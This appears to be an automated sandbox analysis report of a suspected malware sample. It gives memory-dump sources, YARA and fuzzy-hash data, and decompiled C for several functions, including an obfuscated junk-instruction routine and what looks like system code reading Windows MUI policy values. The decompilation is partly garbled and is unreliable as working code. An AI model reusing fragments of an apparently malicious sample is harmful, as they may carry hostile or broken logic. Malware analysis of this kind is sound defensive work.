Source File: 00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 622c55a551f2a3710ca15f35a1068b8193fa72338b31a42c8a230178039be0f3
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 3FD012716002147BD620DB99CC85FD777ACDF48750F058065BA1D5B241C531BA00C6E5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040C37C, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 15%

			E0040C37C(signed int* __ecx, void* __edx, signed int* __esi) {
				void* _t40;
				signed char _t42;
				void* _t43;
				signed int* _t44;
				signed int* _t45;
				signed int _t47;
				signed int _t48;
				signed int* _t65;
				void* _t70;
				void* _t76;
				signed int* _t82;
				void* _t86;
				void* _t90;
				signed int* _t95;
				signed int _t97;

				_t82 = __esi;
				_t70 = __edx;
				_t65 = __ecx;
				asm("bswap ebx");
				asm("adc ebp, esp");
				_t42 = _t40 - __ecx[0x1cfebcdc];
				 *0xb83fd878 = _t42;
				asm("xlatb");
				 *__esi =  *__esi | _t42;
				_pop(_t43);
				asm("adc al, 0x7");
				_t44 = _t43 -  *((intOrPtr*)(_t86 + 7));
				_t95 = _t44;
				asm("lodsd");
				if(_t95 < 0) {
					asm("sbb eax, 0x64a59f4c");
					asm("in eax, 0x8d");
					return _t44;
				} else {
					asm("xlatb");
					asm("sti");
					 *0xc05cc95c = _t44;
					if(_t95 != 0) {
						L9:
						 *((intOrPtr*)(_t65 - 0x73)) =  *((intOrPtr*)(_t65 - 0x73)) + _t70;
						_t45 = _t82;
						_t82 = _t44;
						asm("fdivr qword [edi]");
						 *_t45 = _t45 +  *_t45;
						_push(_t70);
						goto L10;
					} else {
						_t90 = _t90 +  *((intOrPtr*)(__esi - 0xb));
						asm("cld");
						if(_t90 >= 0) {
							asm("sbb [eax+0xaf4d720], edx");
							_t97 = _t44[0x5dfc26e] * 0xffffff97;
						}
						_t47 = 0x97177f09;
						asm("int1");
						asm("stosb");
						asm("fcomp dword [ecx]");
						if(_t97 <= 0) {
							asm("in al, dx");
							_t44 =  *( *((intOrPtr*)(_t86 + 0xc)) + 8);
							_push(_t82);
							_push(0x328a7f64);
							_t76 = 0;
							if(_t44 != 8) {
								if(_t44 != 0xd) {
									if(_t44 != 9) {
										if(_t44 != 0x1b) {
											if(_t44 != 0x12) {
												if( &(_t44[0xffffffffffffffe4]) > 0x17) {
													goto L14;
												} else {
													return 1;
												}
											} else {
												_t82 =  *(_t86 + 8);
												E0041A090( &(_t82[0xff7]),  &(_t82[0x131d]), 0xc);
												_t82[0xfad] = 5;
												goto L11;
											}
										} else {
											_t82 =  *(_t86 + 8);
											E0041A090( &(_t82[0xff7]),  &(_t82[0x1317]), 0xc);
											_t82[0xfad] = 5;
											goto L11;
										}
									} else {
										_t82 =  *(_t86 + 8);
										E0041A090( &(_t82[0xff7]),  &(_t82[0x1323]), 0xc);
										_t82[0xfad] = 5;
										goto L11;
									}
								} else {
									_t82 =  *(_t86 + 8);
									_push(0x10);
									_push( &(_t82[0x1329]));
									_push( &(_t82[0xff7]));
									L10:
									E0041A090();
									_t82[0xfad] = 7;
									L11:
									_t47 = _t82[0xfad];
									_push(4);
									goto L12;
								}
							} else {
								_t82 =  *(_t86 + 8);
								_push(0x10);
								_t65 =  &(_t82[0x132f]);
								goto L9;
							}
						} else {
							_push(_t82);
							asm("rcl edx, cl");
							asm("lahf");
							L12:
							_t48 = _t47 + 0x8d;
							_push( &(_t82[0xfb5]));
							_push(_t82 + 0x3fdc + _t48 * 2);
							_t76 = 1;
							E0041A090();
							_t82[0xfad] = _t82[0xfad] + 2;
							L0040C150(_t82, 2);
							L14:
							return _t76;
						}
					}
				}
			}

0x0040c37c
0x0040c37c
0x0040c37c
0x0040c37c
0x0040c37e
0x0040c381
0x0040c387
0x0040c399
0x0040c39a
0x0040c39d
0x0040c39e
0x0040c3a0
0x0040c3a0
0x0040c3a3
0x0040c3a4
0x0040c3fc
0x0040c401
0x0040c40d
0x0040c3a6
0x0040c3a6
0x0040c3a7
0x0040c3a8
0x0040c3ad
0x0040c42c
0x0040c42c
0x0040c42f
0x0040c42f
0x0040c430
0x0040c432
0x0040c434
0x00000000
0x0040c3af
0x0040c3af
0x0040c3b2
0x0040c3b3
0x0040c3b5
0x0040c3bb
0x0040c3bb
0x0040c3bd
0x0040c3c2
0x0040c3c3
0x0040c3c9
0x0040c3cb
0x0040c412
0x0040c416
0x0040c419
0x0040c41a
0x0040c41b
0x0040c420
0x0040c483
0x0040c49d
0x0040c4c6
0x0040c4f2
0x0040c521
0x00000000
0x0040c527
0x0040c52f
0x0040c52f
0x0040c4f4
0x0040c4f4
0x0040c507
0x0040c50c
0x00000000
0x0040c50c
0x0040c4c8
0x0040c4c8
0x0040c4db
0x0040c4e0
0x00000000
0x0040c4e0
0x0040c49f
0x0040c49f
0x0040c4b2
0x0040c4b7
0x00000000
0x0040c4b7
0x0040c485
0x0040c485
0x0040c488
0x0040c490
0x0040c497
0x0040c435
0x0040c435
0x0040c43a
0x0040c444
0x0040c444
0x0040c44d
0x00000000
0x0040c44d
0x0040c422
0x0040c422
0x0040c425
0x0040c427
0x00000000
0x0040c427
0x0040c3cd
0x0040c3d3
0x0040c3d4
0x0040c3d9
0x0040c44e
0x0040c44e
0x0040c455
0x0040c45d
0x0040c45e
0x0040c463
0x0040c468
0x0040c472
0x0040c47a
0x0040c47f
0x0040c47f
0x0040c3cb
0x0040c3ad

Memory Dump Source

Source File: 00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc4ea449e962043c57ebca4f50afbbe37670fbb242d9435d9fc47d7451d060cf
Instruction ID: 59c73d74cf2ae9b9f2fd076c95290d1be3398c55c4589bd7ac61dcce2cc522dc
Opcode Fuzzy Hash: bc4ea449e962043c57ebca4f50afbbe37670fbb242d9435d9fc47d7451d060cf
Instruction Fuzzy Hash: 332178326053809FC712CF78D891AE6BBB8EF86314F0446ABD9489F183C336D619CB95

Uniqueness

Uniqueness Score: -1.00%

Function 008926F8, Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.541244971.0000000000870000.00000040.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000005.00000002.541237168.0000000000860000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541326391.0000000000950000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541405998.0000000000960000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541418960.0000000000964000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541427015.0000000000967000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541434949.0000000000970000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541476843.00000000009D0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
Instruction ID: ae60f1a22cb69339c42929c386561dfbe2ba494c769b5c8fdb3ed68af88c931e
Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
Instruction Fuzzy Hash: D8F0AF21324559BFDF48FA989951A7A3396FB94300F68C039A949DB246D6219D408692

Uniqueness

Uniqueness Score: -1.00%

Function 0040C3E9, Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c3e5d626abe6552f72ca6510f573c2c71fd7fa5b37e499923f2b8a4b846d3eb
Instruction ID: 48cf4aebeb07576d310a8e4771773a62b27c8e08cd4af5e2ba62f198efdd6c33
Opcode Fuzzy Hash: 8c3e5d626abe6552f72ca6510f573c2c71fd7fa5b37e499923f2b8a4b846d3eb
Instruction Fuzzy Hash: 67F05C77B0011087C1229E5EF581AF2F3A9D795328F00036EF20C9B181D5329A1947D9

Uniqueness

Uniqueness Score: -1.00%

Function 00406ABB, Relevance: .0, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E00406ABB(void* __eax) {

				asm("pushfd");
				asm("adc bl, [ecx-0x725c4498]");
				return 1;
			}

0x00406abb
0x00406abd
0x00406ad4

Memory Dump Source

Source File: 00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b263e04ee79fc0e7b95e4178497c5a6eb22a9a53b70cc1b2ea6d21d5d1e457a5
Instruction ID: 270b339da28dda4f7837011c43c11494ee6e7cfc18ad56c8c420bf9a9996a831
Opcode Fuzzy Hash: b263e04ee79fc0e7b95e4178497c5a6eb22a9a53b70cc1b2ea6d21d5d1e457a5
Instruction Fuzzy Hash: A2C04C32FA605906D6255C5C6C942F4E76DC75B238E2462DBDC48A77519047C49511C8

Uniqueness

Uniqueness Score: -1.00%

Function 0087F8CC, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.541244971.0000000000870000.00000040.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000005.00000002.541237168.0000000000860000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541326391.0000000000950000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541405998.0000000000960000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541418960.0000000000964000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541427015.0000000000967000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541434949.0000000000970000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541476843.00000000009D0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
Instruction ID: b608c8617bc096b37df9be2f0bc93e64f466faa20b7dbfb3ee59c54b4bfc8c85
Opcode Fuzzy Hash: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
Instruction Fuzzy Hash: EBB01275100540C7F304D704D905F4AB311FBD0F04F40893AE40786591D77EAD28C697

Uniqueness

Uniqueness Score: -1.00%

Function 008810D0, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.541244971.0000000000870000.00000040.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000005.00000002.541237168.0000000000860000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541326391.0000000000950000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541405998.0000000000960000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541418960.0000000000964000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541427015.0000000000967000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541434949.0000000000970000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541476843.00000000009D0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446

Uniqueness

Uniqueness Score: -1.00%

Function 00880060, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.541244971.0000000000870000.00000040.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000005.00000002.541237168.0000000000860000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541326391.0000000000950000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541405998.0000000000960000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541418960.0000000000964000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541427015.0000000000967000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541434949.0000000000970000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541476843.00000000009D0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E

Uniqueness

Uniqueness Score: -1.00%

Function 008801D4, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.541244971.0000000000870000.00000040.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000005.00000002.541237168.0000000000860000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541326391.0000000000950000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541405998.0000000000960000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541418960.0000000000964000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541427015.0000000000967000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541434949.0000000000970000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541476843.00000000009D0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
Instruction ID: 018f436d7687ff9142db90ebed9d2f0c0dfd000868ccafab48d689f3c6447ef1
Opcode Fuzzy Hash: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
Instruction Fuzzy Hash: B2B01272100940C7E359A714ED46B4B7210FB80F01F00C93BA01B81851DB38AA3CDD96

Uniqueness

Uniqueness Score: -1.00%

Function 0088010C, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.541244971.0000000000870000.00000040.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000005.00000002.541237168.0000000000860000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541326391.0000000000950000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541405998.0000000000960000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541418960.0000000000964000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541427015.0000000000967000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541434949.0000000000970000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541476843.00000000009D0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
Instruction ID: 6f78205b53d22ab4e8c81d7e3ead40d6172b524c4c965a7ad5e52c730ffb8076
Opcode Fuzzy Hash: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
Instruction Fuzzy Hash: B8B01273104D40C7E3099714DD16F4FB310FB90F02F00893EA00B81850DA38A92CC846

Uniqueness

Uniqueness Score: -1.00%

Function 00881930, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.541244971.0000000000870000.00000040.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000005.00000002.541237168.0000000000860000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541326391.0000000000950000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541405998.0000000000960000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541418960.0000000000964000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541427015.0000000000967000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541434949.0000000000970000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541476843.00000000009D0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
Instruction ID: 3aeeca65ea1aaf37b62c9893cb2d02334d47a3b29990fed3fb0e6cbc500f1d8d
Opcode Fuzzy Hash: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
Instruction Fuzzy Hash: 52B01272100940C7E34AA714DE07B8BB210FBD0F01F00893BA04B85D50D638A92CC546

Uniqueness

Uniqueness Score: -1.00%

Function 0087F938, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.541244971.0000000000870000.00000040.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000005.00000002.541237168.0000000000860000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541326391.0000000000950000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541405998.0000000000960000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541418960.0000000000964000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541427015.0000000000967000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541434949.0000000000970000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541476843.00000000009D0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
Instruction ID: d523cc507bde657408e54325c2dcaf12b60df831943b7985b4c6fe4931788f26
Opcode Fuzzy Hash: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
Instruction Fuzzy Hash: FCB0927220194087E2099B04D905B477251EBC0B01F408934A50646590DB399928D947

Uniqueness

Uniqueness Score: -1.00%

Function 00881148, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.541244971.0000000000870000.00000040.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000005.00000002.541237168.0000000000860000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541326391.0000000000950000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541405998.0000000000960000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541418960.0000000000964000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541427015.0000000000967000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541434949.0000000000970000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541476843.00000000009D0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
Instruction ID: 165250f8074bc0ef9cdc504fa449021ea13c8322197c03fc884fef66fc1cad38
Opcode Fuzzy Hash: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
Instruction Fuzzy Hash: 23B01272140580C7E31D9718D906B5B7610FB80F00F008D3AA04781CA1DBB89A2CE44A

Uniqueness

Uniqueness Score: -1.00%

Function 0087FAB8, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.541244971.0000000000870000.00000040.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000005.00000002.541237168.0000000000860000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541326391.0000000000950000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541405998.0000000000960000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541418960.0000000000964000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541427015.0000000000967000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541434949.0000000000970000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541476843.00000000009D0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996

Uniqueness

Uniqueness Score: -1.00%

Function 0087FA20, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.541244971.0000000000870000.00000040.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000005.00000002.541237168.0000000000860000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541326391.0000000000950000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541405998.0000000000960000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541418960.0000000000964000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541427015.0000000000967000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541434949.0000000000970000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541476843.00000000009D0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
Instruction ID: 9b5f4fb9875c6876c932e4128e9800c708acc4d40f0b969179b44b3e8b2884d0
Opcode Fuzzy Hash: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
Instruction Fuzzy Hash: 4FB01272100580C7E30D9714D90AB4B7210FB80F00F00CD3AA00781861DB78DA2CD45A

Uniqueness

Uniqueness Score: -1.00%

Function 0087FA50, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.541244971.0000000000870000.00000040.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000005.00000002.541237168.0000000000860000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541326391.0000000000950000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541405998.0000000000960000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541418960.0000000000964000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541427015.0000000000967000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541434949.0000000000970000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541476843.00000000009D0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
Instruction ID: 2cae8b11bd858d750de1a79d340ce6dfe3ec44f87311ce0e8d0be64a47f0ebf6
Opcode Fuzzy Hash: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
Instruction Fuzzy Hash: 9BB01272100544C7E349A714DA07B8B7210FB80F00F008D3BA04782851DFB89A2CE986

Uniqueness

Uniqueness Score: -1.00%

Function 0087FBE8, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.541244971.0000000000870000.00000040.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000005.00000002.541237168.0000000000860000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541326391.0000000000950000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541405998.0000000000960000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541418960.0000000000964000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541427015.0000000000967000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541434949.0000000000970000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541476843.00000000009D0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
Instruction ID: 9452a8d0b0f104eb9e4922b1c8778681c83a3ee0f3d85b1ffb0a7dc5c1b1eaf2
Opcode Fuzzy Hash: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
Instruction Fuzzy Hash: 9AB01272100640C7E349A714DA0BB5B7210FB80F00F00893BE00781852DF389A2CD986

Uniqueness

Uniqueness Score: -1.00%

Function 0087FB50, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.541244971.0000000000870000.00000040.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000005.00000002.541237168.0000000000860000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541326391.0000000000950000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541405998.0000000000960000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541418960.0000000000964000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541427015.0000000000967000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541434949.0000000000970000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541476843.00000000009D0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447

Uniqueness

Uniqueness Score: -1.00%

Function 0087FC30, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.541244971.0000000000870000.00000040.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000005.00000002.541237168.0000000000860000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541326391.0000000000950000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541405998.0000000000960000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541418960.0000000000964000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541427015.0000000000967000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541434949.0000000000970000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541476843.00000000009D0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
Instruction ID: bea31e52b4947098166a5853b381437c0ce687cada8622438d1654f6fc3cd67c
Opcode Fuzzy Hash: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
Instruction Fuzzy Hash: B2B01272140540C7E3099714DA1AB5B7210FB80F00F008D3AE04781891DB7C9A2CD486

Uniqueness

Uniqueness Score: -1.00%

Function 008A8788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E008A8788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E008A8460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E0088E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E008A718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E008A8460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E0088E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E008A718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E008A8460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E008A8460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
